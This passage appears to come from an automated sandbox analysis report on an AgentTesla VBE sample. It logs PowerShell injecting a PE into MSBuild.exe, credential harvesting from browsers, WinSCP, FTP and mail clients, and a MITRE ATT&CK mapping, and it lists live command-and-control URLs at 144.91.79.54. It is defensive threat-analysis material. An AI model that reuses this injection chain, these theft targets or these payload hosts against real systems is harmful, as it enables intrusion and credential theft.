                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99321Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99193Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99048Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: wscript.exe, 00000000.00000003.2106114461.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122914115.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106301353.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2105634223.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125377044.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122279561.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110586290.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123769033.0000019303A9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                  Source: wscript.exe, 00000000.00000003.2106114461.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122914115.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106301353.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2105634223.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125377044.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122279561.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106265181.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106079195.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110848703.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122279561.0000019303A9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122620326.0000019303A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 00000005.00000002.3348155755.0000000005917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 340000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 340000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 342000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 37C000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 37E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 49C008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6004" "2764" "2772" "2788" "0" "0" "2828" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 5.2.MSBuild.exe.340000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3346351856.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3346351856.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3346351856.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 380, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 5.2.MSBuild.exe.340000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3346351856.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 380, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 5.2.MSBuild.exe.340000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3346351856.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3346351856.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3346351856.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 380, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information311
                  Scripting                  		Valid Accounts121
                  Windows Management Instrumentation                  		311
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                  Virtualization/Sandbox Evasion                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSHKeylogging23
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                  Process Injection                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592175 Sample: 009.vbe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 28 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->28 30 s-part-0017.t-0009.fb-t-msedge.net 2->30 32 3 other IPs or domains 2->32 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 8 other signatures 2->46 8 wscript.exe 1 2->8         started        11 wscript.exe 32 1 2->11         started        signatures3 process4 dnsIp5 56 Wscript starts Powershell (via cmd or directly) 8->56 58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->58 15 powershell.exe 44 8->15         started        38 144.91.79.54, 49706, 80 CONTABODE Germany 11->38 26 C:\Users\user\AppData\...\bEvujIIdkyIbOgF.vbs, ASCII 11->26 dropped 60 System process connects to network (likely due to code injection or exploit) 11->60 62 Potential evasive VBS script found (sleep loop) 11->62 64 Windows Shell Script Host drops VBS files 11->64 66 Suspicious execution chain found 11->66 file6 signatures7 process8 signatures9 68 Writes to foreign memory regions 15->68 70 Injects a PE file into a foreign processes 15->70 18 MSBuild.exe 15 2 15->18         started        22 wermgr.exe 19 15->22         started        24 conhost.exe 15->24         started        process10 dnsIp11 34 162.254.34.31, 49709, 587 VIVIDHOSTINGUS United States 18->34 36 api.ipify.org 172.67.74.152, 443, 49707 CLOUDFLARENETUS United States 18->36 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->48 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->50 52 Tries to steal Mail credentials (via file / registry access) 18->52 54 2 other signatures 18->54 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  009.vbe44%VirustotalBrowse
                  009.vbe21%ReversingLabsScript-WScript.Trojan.AgentTesla

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://144.91.79.54:80/2412/file0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txt0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/rs0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/s0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/r0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/v0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/v0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txt0%Avira URL Cloudsafe
                  http://144.91.79.54/e4P0%Avira URL Cloudsafe
                  http://144.91.79.54/e40%Avira URL Cloudsafe
                  http://144.91.79.54/ll0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/rd0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/file0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/cn0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/rdN0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/r0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/s8O0%Avira URL Cloudsafe
                  http://144.91.79.54/0%Avira URL Cloudsafe
                  http://144.91.79.50%Avira URL Cloudsafe
                  http://144.91.79.54/2412/r8O0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		high
                    s-part-0017.t-0009.fb-t-msedge.net
                    		13.107.253.45
                    		truefalse
                      		high
                      api.ipify.org
                      		172.67.74.152
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://144.91.79.54/2412/vwscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2412/rswscript.exe, 00000000.00000003.2110457845.0000019303A63000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2412/swscript.exe, 00000000.00000003.2106191750.000001930574B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54:80/2412/filewscript.exe, 00000000.00000003.2122620326.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123769033.0000019303A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123079339.0000019303A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122279561.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125377044.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://account.dyn.com/MSBuild.exe, 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://144.91.79.54/2412/rwscript.exe, 00000000.00000003.2123186894.000001930574F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121950926.000001930574B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125683822.0000019305750000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txtwscript.exe, 00000000.00000003.2122620326.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123769033.0000019303A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123079339.0000019303A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122279561.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125377044.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txtwscript.exe, 00000000.00000003.2121136354.00000193059D2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54:80/2412/vwscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/e4wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/e4Pwscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.ipify.org/tMSBuild.exe, 00000005.00000002.3346351856.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://144.91.79.54:80/2412/rwscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54/llwscript.exe, 00000000.00000003.2106265181.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106079195.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110848703.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110681597.0000019303A47000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.ipify.orgMSBuild.exe, 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3346351856.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
